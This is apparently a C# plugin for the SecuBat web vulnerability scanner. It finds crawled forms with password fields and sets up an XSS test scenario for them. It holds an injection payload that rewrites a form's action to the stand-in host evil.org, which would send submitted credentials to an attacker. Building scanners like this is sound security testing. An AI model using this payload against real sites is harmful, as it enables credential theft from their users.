using System;
using System.Collections;
using SecuBat.AttackPlugin;
using SecuBat.Crawling;
using SecuBat.Crawling.Forms;
using Css.Diagnostics;
using SecuBat.Logging;

namespace SecuBat.AttackPlugins.SimpleXss
{
	/// <summary>
	/// Summary description for CommonData.
	/// </summary>
	[CommonDataPlugin]
	public class XssScenarioCredentialsCommonData : CommonDataBase, ICommonData
	{
		private String _injectionHtml;
		private Hashtable _sensitiveDomains;

		public string InjectionHtml
		{
			get { return _injectionHtml; }
			set { _injectionHtml = value; }
		}

		public Hashtable SensitiveDomains
		{
			get { return _sensitiveDomains; }
			set { _sensitiveDomains = value; }
		}

		public XssScenarioCredentialsCommonData()
		{
			//_injectionHtml = "<script type=text/javascript>alert('test');</script>";
			//_injectionHtml = "<b>awsaf</b>";
			InjectionHtml = "<IMG SRC=JaVaScRiPt:document.forms[{0}].action=&quot;http://evil.org/evil.cgi&quot;>";
			SensitiveDomains = new Hashtable();
		}

		public override void InitializeData(ArrayList webFormIds)
		{
			base.InitializeData(webFormIds);

			// Check each form for password fields
			lock (SensitiveDomains)
			{
				for (int i = 0; i < webFormIds.Count; i ++)
				{
					int id = (int) webFormIds[i];
					WebForm form = CrawlDbManager.GetWebForm(id);
					form.ParseForm();
					foreach (FormParameter parameter in form.Parameters)
					{
						if (parameter.Type == FormParameterType.Password)
						{
							// Remember all domains that contain password fields
							if (SensitiveDomains.ContainsKey(form.Referrer.HostName))
							{
								String formIds = (String) SensitiveDomains[form.Referrer.HostName];
								SensitiveDomains[form.Referrer.HostName] = formIds + form.Id + ";";
							}
							else
							{
								SensitiveDomains.Add(form.Referrer.HostName, form.Id + ";");
							}
						}
					}
					LogManager.Write(TraceLevel.Verbose, String.Format("Parsed form number {0} of {1} for password fields.", i, webFormIds.Count), "Common data initialization");
				}
			}
		}
	}
}
